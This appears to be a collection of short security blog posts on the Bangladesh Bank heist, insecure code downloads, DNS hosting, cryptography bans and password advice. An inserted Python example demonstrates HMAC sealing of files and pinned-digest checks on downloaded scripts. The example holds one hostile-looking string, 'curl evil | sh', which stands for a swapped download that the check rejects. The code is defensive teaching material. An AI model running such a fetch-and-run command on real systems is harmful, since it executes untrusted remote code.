The next time anyone tells you that they have built a „Secure“ system, get them to read this article.
Source: BAE Systems Threat Research Blog: Two bytes to $951m
An unknown number of people with a lot of easily acquired knowledge, but not so common skills, developed and deployed a system of hacks to manipulate a „secure“ banking system into transferring almost a billion dollars to unknown accounts. A large amount of this money is now „accounted for“, whatever that means, while 81 million dollars are still missing. That looks like a pretty good return on investment if you are not too worried about illegalities, or if you consider it merely liberating the money from robber banks.
Of course, many will say „our security standards are better than those in Bangladesh“, but those people are just trying to reassure those who cannot, for whatever reason, understand the signals generated by this particular case.
An incredible number of systems rely on the key system parts misused in this hack. I would not have believed it until I saw it: so many systems rely on reading and writing text files from some location, often a network share, and those files are easily manipulated if due attention is not paid to securing them.
Just last week I had an application development team who could not, or would not because of time constraints, understand why it was a bad idea to let a server inside the secure zone reach out to a server on the internet in order to automatically download some code. The number of ways in which their deployment scheme could be hacked into and misused was mind-boggling, and yet they considered it not only safe but also perfectly normal. Someone is going to make a lot of money out of their overly relaxed attitude if they draw the wrong kind of attention.
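Both of the last two posts come down to the same thing: data that crosses a trust boundary (a text file dropped on a share, a script pulled from the internet) is acted upon without anyone checking that it is what it claims to be. The following is an added example, not code from the original posts, from the BAE report or from any bank's software, showing the two checks a practitioner would want: a keyed MAC on files handed over via a share, and a pinned digest on anything fetched from outside. The payment message, the key, the script and the "download" are all constructed for illustration; the message is only loosely shaped like a SWIFT MT103 and is not a real format definition.

```python
"""Integrity checks for data that crosses a trust boundary.

Added example (not from the original posts or the BAE report): two small
checks that catch the kind of silent tampering the posts warn about.
Every name, key, digest and message below is constructed for illustration.
"""
import hashlib
import hmac
from typing import Optional

# --- 1. Text files handed over via a share ------------------------------
# A file on a network share proves nothing about who wrote it.  If the
# producer appends a MAC computed with a key that never lives on the share,
# the consumer can refuse anything that was edited in transit.

# Hypothetical shared secret, held by producer and consumer only
HANDOFF_KEY = b"example-key-do-not-use-in-production"

# Constructed payment instruction, loosely shaped like an MT103
PAYMENT = b"MT103\n:20:REF0001\n:32A:160204USD20000000,\n:59:/ACCT-EXAMPLE\n"


def seal(message: bytes, key: bytes = HANDOFF_KEY) -> bytes:
    """Return the message with a trailing line carrying its HMAC-SHA256."""
    tag = hmac.new(key, message, hashlib.sha256).hexdigest()
    return message + b"\nMAC " + tag.encode()


def open_sealed(blob: bytes, key: bytes = HANDOFF_KEY) -> Optional[bytes]:
    """Return the message if the MAC verifies, otherwise None."""
    body, sep, tagline = blob.rpartition(b"\nMAC ")
    if not sep:
        return None  # no tag at all: never trust an unsealed file
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    # constant-time compare so the check does not leak the tag byte by byte
    if not hmac.compare_digest(expected, tagline.strip()):
        return None
    return body


def tamper(blob: bytes, old: bytes, new: bytes) -> bytes:
    """Simulate an attacker editing the file in place on the share."""
    assert len(old) == len(new) and old in blob
    return blob.replace(old, new, 1)


# --- 2. Code pulled from the outside ------------------------------------
# A server that fetches and runs whatever a URL returns trusts DNS, the
# network path and the remote host all at once.  If the artifact must be
# fetched at all, its expected digest is recorded out of band (in the
# deployment repo, reviewed like code) and the download is discarded
# unless it matches.  Here the "download" is a constructed byte string.

def verify_artifact(data: bytes, pinned_sha256: str) -> bool:
    """True only if data matches the digest recorded at review time."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), pinned_sha256)


def demo() -> dict:
    """Run both checks against genuine and tampered inputs."""
    sealed = seal(PAYMENT)
    forged = tamper(sealed, b"USD20", b"USD81")  # two bytes changed
    script = b"#!/bin/sh\necho deploy\n"
    pinned = hashlib.sha256(script).hexdigest()   # recorded out of band
    swapped = script.replace(b"echo deploy", b"curl evil | sh")
    return {
        "genuine_file_accepted": open_sealed(sealed) == PAYMENT,
        "forged_file_rejected": open_sealed(forged) is None,
        "unsealed_file_rejected": open_sealed(PAYMENT) is None,
        "pinned_artifact_accepted": verify_artifact(script, pinned),
        "swapped_artifact_rejected": not verify_artifact(swapped, pinned),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

Note what the two checks do and do not buy you. The MAC only helps if the key is not itself sitting on the share or on a host the attacker already owns, and it says nothing about whether the producer was entitled to issue the instruction; that is an authorisation question the check deliberately leaves alone. Likewise the pinned digest catches a swapped download, but it does not make "pull code from the internet into the secure zone" a good design; it just removes one of the many ways it goes wrong.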
A more than interesting take on the „we have to have full control of our DNS“ discussions found in many companies. There are of course many reasons why people inside the organisation will view moving DNS services to a provider as wrong, job security among them, but as more and more companies succumb to the „Cloud“ hype, the more relevant this point is going to become: „Besides, as organizations continue to move their services to the cloud, why would you have the name resolution of those resources tied to some legacy, on-premise server?“
Source: Why You Shouldn’t Be Hosting Public DNS | Postmodern Security
Hopefully the ridicule poured upon the UK’s Prime Minister, Cameron, regarding his desire to ban cryptography (or at least to water it down) will have caused all parties to put their heads back on the right way round. Just in case any government is still planning such a move, here are a few words of caution for anyone willing to listen:
A Few Thoughts on Cryptographic Engineering: Attack of the week: FREAK (or ‚factoring the NSA for fun and profit‘).
Let’s all give a hearty round of applause for whoever thought it would be a good idea to let this kind of danger out into the wild.
NSA Hacked Firmware
Now that the technology is out there and has been found, any bad guys can get their hands on the technology and apply it for their own purposes.
Remember, any weapon is a weapon you don’t want in the hands of your enemies so don’t go handing them out like candy.
No one can go back over x years of penetration logs, let alone in six days.
Then, there is this aspect:
There is that familiar smell in the air of someone trying to cover their ar*e after the bull has done its business and bolted.
Crash Override Network — Account Security 101: Passwords, Multifactor,….
I know, it’s hard to do some things right. I also know there’s a lot of bad advice out there. This is pretty good though, for now. One of the problems with security is that as soon as a method becomes popular, it becomes a target for the bad guys/gals/ones.
Some of these points will (famous last words) remain relevant until passwords become a thing of the past.